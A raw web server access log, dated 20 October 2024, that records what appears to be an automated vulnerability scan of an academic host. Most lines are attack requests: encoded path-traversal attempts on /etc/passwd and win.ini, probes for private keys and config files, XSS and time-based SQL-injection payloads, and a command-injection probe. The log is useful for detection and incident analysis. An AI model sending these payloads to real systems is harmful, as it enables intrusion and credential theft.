195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /certificates/sdc.iopan.pl.pfx HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /certificates/sdc.iopan.pl.p12 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /ssl/sdc.iopan.pl.pem HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /ssl/sdc.iopan.pl_key.txt HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /cert/sdc.iopan.pl_key.txt HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /cert/iopan.pl_key.txt HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /cert/sdc.iopan.pl.txt HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /ssl/private/sdc.iopan.pl_key.pem HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /certs/sdc.iopan.pl_private.key HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:15:50:37 +0000] GET /certs/sdc.iopan.pl.key HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:50:38 +0000] GET /certificates/sdc.iopan.pl_priv.pem HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:50:38 +0000] GET /certificates/sdc.iopan.pl_privkey.pem HTTP/1.1 404 1115
83.212.98.101 - - [20/Oct/2024:15:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:50:49 +0000] GET /certs/sdc.iopan.pl.pem HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:50:49 +0000] GET /private/sdc.iopan.pl.key HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:50:49 +0000] GET /keys/sdc.iopan.pl.pem HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:51:07 +0000] PUT /2nhxa2HSfdKI4tdmJoVzxbbLGMo.json HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:51:09 +0000] GET /2nhxa2HSfdKI4tdmJoVzxbbLGMo.json HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:51:15 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:51:20 +0000] POST /fpui/loginServlet HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:51:21 +0000] GET /%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:51:31 +0000] GET /../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:31 +0000] GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:51:31 +0000] GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:51:31 +0000] GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:15:51:31 +0000] GET /../../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:32 +0000] GET /../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:32 +0000] GET /../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:32 +0000] GET /WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:15:51:32 +0000] GET /.//WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:15:51:32 +0000] GET /../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:37 +0000] GET /../../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:38 +0000] GET /../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:47 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:49 +0000] GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:51 +0000] GET /etc/passwd HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:51:51 +0000] GET /..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:51 +0000] GET /..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:51 +0000] GET /..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:52 +0000] GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:53 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:53 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:53 +0000] GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:54 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:55 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:15:51:55 +0000] GET /..///////..////..//////etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:55 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:51:56 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:15:51:56 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1224
195.164.49.69 - - [20/Oct/2024:15:51:56 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1 404 1165
195.164.49.69 - - [20/Oct/2024:15:51:56 +0000] GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 400 1169
83.212.98.101 - - [20/Oct/2024:15:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:52:37 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 404 1139
195.164.49.69 - - [20/Oct/2024:15:52:38 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:52:39 +0000] GET /index.php?page=etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:52:39 +0000] GET /index.php?page=etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:52:39 +0000] GET /index.php?page=../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:52:39 +0000] GET /index.php?page=....//....//etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:52:39 +0000] GET /../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:52:51 +0000] GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:15:52:53 +0000] GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 400 1162
195.164.49.69 - - [20/Oct/2024:15:52:55 +0000] POST /fetch_products.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:52:57 +0000] GET /systemController/showOrDownByurl.do?down&dbPath=../../../../../../etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:52:59 +0000] GET /systemController/showOrDownByurl.do?down&dbPath=../Windows/win.ini HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:53:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:53:05 +0000] GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:53:07 +0000] GET /wp-content/plugins/knews/readme.txt HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:15:53:09 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:15:53:11 +0000] POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1 404 1153
195.164.49.69 - - [20/Oct/2024:15:54:02 +0000] GET /parameters.yml HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:54:04 +0000] GET /app/config/parameters.yml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:54:06 +0000] GET /parameters.yml.dist HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:54:08 +0000] GET /app/config/parameters.yml.dist HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:54:10 +0000] GET /downlot.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:54:12 +0000] GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:54:14 +0000] GET /api/v1/user/save?ID&Username=z732a&Role=%e7%ae%a1%e7%90%86%e5%91%98&Enable=true HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:54:16 +0000] GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:54:18 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:54:20 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:54:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:54:24 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:54:26 +0000] GET /jenkins/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:54:28 +0000] GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:54:30 +0000] GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:54:32 +0000] GET /lan.html HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:54:34 +0000] GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:54:36 +0000] GET /resource/file%3a///etc/passwd/ HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:15:54:38 +0000] GET /index.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:54:40 +0000] GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:54:42 +0000] GET /configuration.yml HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:54:44 +0000] GET /config/configuration.yml HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:54:46 +0000] GET /redmine/config/configuration.yml HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:54:48 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:54:50 +0000] GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:15:54:52 +0000] GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:15:54:54 +0000] GET /../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:54:56 +0000] GET /?aam-media=wp-config.php HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:54:58 +0000] GET /i/?a=logs HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:55:02 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:55:04 +0000] GET /jkstatus HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:55:06 +0000] GET /jkstatus; HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:55:12 +0000] GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:55:14 +0000] GET /.htpasswd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:55:16 +0000] GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:55:18 +0000] GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:55:20 +0000] GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:55:22 +0000] GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:55:24 +0000] GET /sftp-config.json HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:55:26 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:55:28 +0000] GET /manage.py HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:55:30 +0000] GET /settings.py HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:55:32 +0000] GET /app/settings.py HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:55:34 +0000] GET /django/settings.py HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:55:36 +0000] GET /settings/settings.py HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:55:38 +0000] GET /web/settings/settings.py HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:55:42 +0000] GET /__clockwork/latest HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:55:44 +0000] GET /index.php/install/ HTTP/1.1 404 1100
83.212.98.101 - - [20/Oct/2024:15:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:55:46 +0000] GET /searchreplacedb2.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:55:48 +0000] GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:55:50 +0000] GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:55:52 +0000] GET /plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:55:54 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:55:56 +0000] GET /UI/Dashboard HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:55:58 +0000] GET /jackett/UI/Dashboard HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:56:00 +0000] GET /wd/hub HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:56:02 +0000] GET /_vti_pvt/service.pwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:56:04 +0000] GET /web/admin/setup HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:56:06 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:56:08 +0000] GET /config/databases.yml HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:56:10 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:56:12 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:56:13 +0000] GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:56:16 +0000] GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:56:17 +0000] GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:56:19 +0000] GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:56:21 +0000] GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:56:23 +0000] GET /../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:56:25 +0000] GET /auth.json HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:56:27 +0000] GET /install.html HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:56:29 +0000] GET /setup HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:56:31 +0000] GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:56:33 +0000] GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:56:35 +0000] GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:56:37 +0000] GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1188
195.164.49.69 - - [20/Oct/2024:15:56:39 +0000] GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1201
195.164.49.69 - - [20/Oct/2024:15:56:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:56:43 +0000] GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:56:46 +0000] GET /admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:56:47 +0000] GET /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:56:49 +0000] GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:56:51 +0000] GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1 404 1095
- - - [20/Oct/2024:15:56:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:56:55 +0000] GET /login.php/'%3E%3Csvg/onload=alert%602nhxa0kaFDriG9BYAp4aaL8EBZg%60%3E HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:15:56:57 +0000] GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:56:59 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/macH.css HTTP/1.1 404 1178
195.164.49.69 - - [20/Oct/2024:15:57:01 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/MxWn.css HTTP/1.1 404 1191
195.164.49.69 - - [20/Oct/2024:15:57:03 +0000] GET /.ftpconfig HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:57:05 +0000] GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:57:07 +0000] GET /../conf/config.properties HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:57:09 +0000] GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:15:57:11 +0000] GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:15:57:13 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:57:15 +0000] GET /admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:57:17 +0000] GET /.drone.yml HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:57:19 +0000] GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:57:21 +0000] GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1 404 1198
195.164.49.69 - - [20/Oct/2024:15:57:23 +0000] GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1 404 1198
195.164.49.69 - - [20/Oct/2024:15:57:25 +0000] GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:15:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:57:27 +0000] GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:29 +0000] GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:31 +0000] GET ///////../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:57:33 +0000] GET /static///////../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:57:35 +0000] GET ///../app.js HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:57:37 +0000] GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:15:57:39 +0000] GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:57:41 +0000] GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:57:43 +0000] GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:48 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:57:49 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:57:51 +0000] GET /ui/login.php?user=admin HTTP/1.1 404 1090
